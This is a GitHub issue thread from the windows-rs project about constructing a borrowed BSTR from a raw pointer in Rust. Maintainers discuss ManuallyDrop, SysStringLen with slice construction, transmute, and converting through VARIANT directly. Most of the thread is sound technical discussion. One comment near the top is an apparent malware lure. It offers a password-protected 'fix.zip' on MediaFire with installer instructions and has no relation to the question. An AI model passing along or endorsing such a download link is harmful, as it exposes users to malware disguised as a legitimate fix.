### ISSUE TITLE
Using `BSTR` from a borrowed pointer

### ISSUE THREAD

**Issue by ohadravid** [microsoft/windows-rs#3230]
### Suggestion

Hi,

Recently I wanted to use `windows_strings::BSTR`, but didn't have ownership of the original pointer.

Is there a way to have something like `BSTR::from_raw_borrowed(*const u16) -> &BSTR`?

### Background

While updating the `wmi-rs` crate to `windows` version 0.58 ([PR](https://github.com/ohadravid/wmi-rs/pull/98)), there was a need to change this code:

```
// in a `fn from_variant(vt: &VARIANT)`
let variant_value = match variant_type {
    VT_BSTR => {
        let bstr_ptr: &BSTR = unsafe { &vt.Anonymous.Anonymous.Anonymous.bstrVal };

        Variant::String(bstr_ptr.try_into()?)
    }
    ...
}
```

Since `bstrVal` is `*const u16`.

The result is something like this:

```
let bstr_ptr = unsafe { BSTR::from_raw(vt.Anonymous.Anonymous.Anonymous.bstrVal) };
let bstr_as_str = bstr_ptr.to_string();
// We don't want to be the ones freeing the BSTR.
let _ = bstr_ptr.into_raw();
```

(Which I _think_ is right, since the `VARIANT`'s data is owned by someone else)

This would have been more ergonomic and less error prune if where was an option to construct a `&BSTR` from the raw pointer.

Thanks for the awesome work!

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tim-weis** [comment]
`BSTR::from_raw_borrowed(*const u16) -> &BSTR` cannot exist, since pointers aren't associated with lifetimes.

If you need an owned copy of a `BSTR` call [`SysAllocString`](https://learn.microsoft.com/en-us/windows/win32/api/oleauto/nf-oleauto-sysallocstring) to create a copy.

**Comment by tim-weis** [comment]
The code you've shown reads like you're looking for [`ManuallyDrop`](https://doc.rust-lang.org/std/mem/struct.ManuallyDrop.html). This wrapper allows you to construct a `BSTR` from a pointer owned elsewhere, without accidentally running its destructor.

As far as functionality goes, what you're asking for is `impl TryFrom<&VARIANT> for String`, unless I'm misunderstanding the code. I suppose that *could* be implemented, although I'd still like to have a better string type for the `windows` family of crates, instead of baking the `String`/`str`/`OsString`/`OsStr`/`CString`/`CStr` conversion machinery into every interface.

**Comment by kennykerr** [comment]
> although I'd still like to have a better string type for the windows family of crates

[HSTRING](https://docs.rs/windows-strings/0.1.0/windows_strings/struct.HSTRING.html) should be that string type. If its not let me know. 😊

**Comment by tim-weis** [comment]
> [HSTRING](https://docs.rs/windows-strings/0.1.0/windows_strings/struct.HSTRING.html) should be that string type. If its not let me know. 😊

`HSTRING` is a great example of what I'm looking for. It serves as a canonical string representation, that consolidates conversions from and to other string types. It's a surprisingly simple design that works very well in practice.

The string type I'm looking for is like `HSTRING` with a few extras: It needs to be mutable and "pre-allocatable". The intended use is as the input/output area for API calls. The primary goal is to losslessly maintain (UTF-16) strings while passing them through a sequence of API calls.

However, I should dedicate a separate issue to this instead of hijacking this one.

**Comment by kennykerr** [comment]
You may want to consider [HStringBuilder](https://docs.rs/windows-strings/0.1.0/windows_strings/struct.HStringBuilder.html).

**Comment by ohadravid** [comment]
Hi @kennykerr - WDYT about having a `BSTR::from_raw_borrowed(&*const u16) -> &BSTR`? (the original issue / feature request is unrelated to `HSTRING` and "better string" stuff).

Sounds to me like this should be safe (and useful) 😄

**Comment by tim-weis** [comment]
`BSTR::from_raw_borrowed(&*const u16) -> &BSTR` is foot gun material. A `BSTR` is a `*const u16` with *additional* properties (namely, a length prefix and its corollaries). Failure to encode that in the type system will inevitably break on either side of the (non-)contract.

Since you want a `&[u16]` only you don't need to construct a `BSTR` at all. You know the pointer to the start already (`bstrVal`) and can discover the length using [`SysStringLen`](https://learn.microsoft.com/en-us/windows/win32/api/oleauto/nf-oleauto-sysstringlen). This information can be passed into [`slice::from_raw_parts`](https://doc.rust-lang.org/std/slice/fn.from_raw_parts.html).

If that is not something you want to do you could also [`transmute`](https://doc.rust-lang.org/std/mem/fn.transmute.html) a reference to `bstrVal` into a `&BSTR` (I think), and get a borrowed `BSTR` for its interface alone.

**Comment by ohadravid** [comment]
@tim-weis What I'm asking is if it makes sense that `BSTR` would provide this `transmute` since **it is a useful thing to provide** (IMO).

For example, if I did this `transmute` before and `BSTR` wasn't `repr(transparent)` I would have gotten UB in my crate.

Your other suggestions don't really apply for my usecase.

**Comment by kennykerr** [comment]
I think there's a larger issue here around the usability/ergonomics of `BSTR`/`VARIANT`/`SAFEARRAY` and I've attempted to make it easier to work with `BSTR` and `VARIANT` but there's still clearly room for improvement.

**Comment by tim-weis** [comment]
> Your other suggestions don't really apply for my usecase.

If you think that transmuting applies, then the other suggestion applies just as well. Constructing a slice manually merely avoids relying on `BSTR` being `repr(transparent)`, but the code generated is identical. This is how `to_wide()` is implemented[^1]:

https://github.com/microsoft/windows-rs/blob/9f5ec21529ec0530ac16e9a1c5d16eb8bb290535/crates/libs/strings/src/bstr.rs#L30-L33

And this this `len()`:

https://github.com/microsoft/windows-rs/blob/9f5ec21529ec0530ac16e9a1c5d16eb8bb290535/crates/libs/strings/src/bstr.rs#L21-L28

Either approach works, just as wrapping the `BSTR` inside a `ManuallyDrop`, and either of these is more resilient when the code gets changed than what you have now.

This is a workaround until more complete variant support arrives.

[^1]: I don't know where `to_string()` is coming from but I assume it operates on a `&[u16]`.

**Comment by kennykerr** [comment]
> // in a `fn from_variant(vt: &VARIANT)`
> let variant_value = match variant_type {
>     VT_BSTR => {
>         let bstr_ptr: &BSTR = unsafe { &vt.Anonymous.Anonymous.Anonymous.bstrVal };
> 
>         Variant::String(bstr_ptr.try_into()?)
>     }
>     ...
> }

Taking a step back, is there an option to use `VARIANT` directly as it provides `From`/`Into` to convert between `BSTR` and other types? That should be a lot simpler.

**Comment by ohadravid** [comment]
> .. is there an option to use `VARIANT` directly

Yes you are right @kennykerr, I still need `as_raw` for other stuff but I can use the `VARIANT` directly for the `BSTR` case which simplify this 🥳 

Thanks!
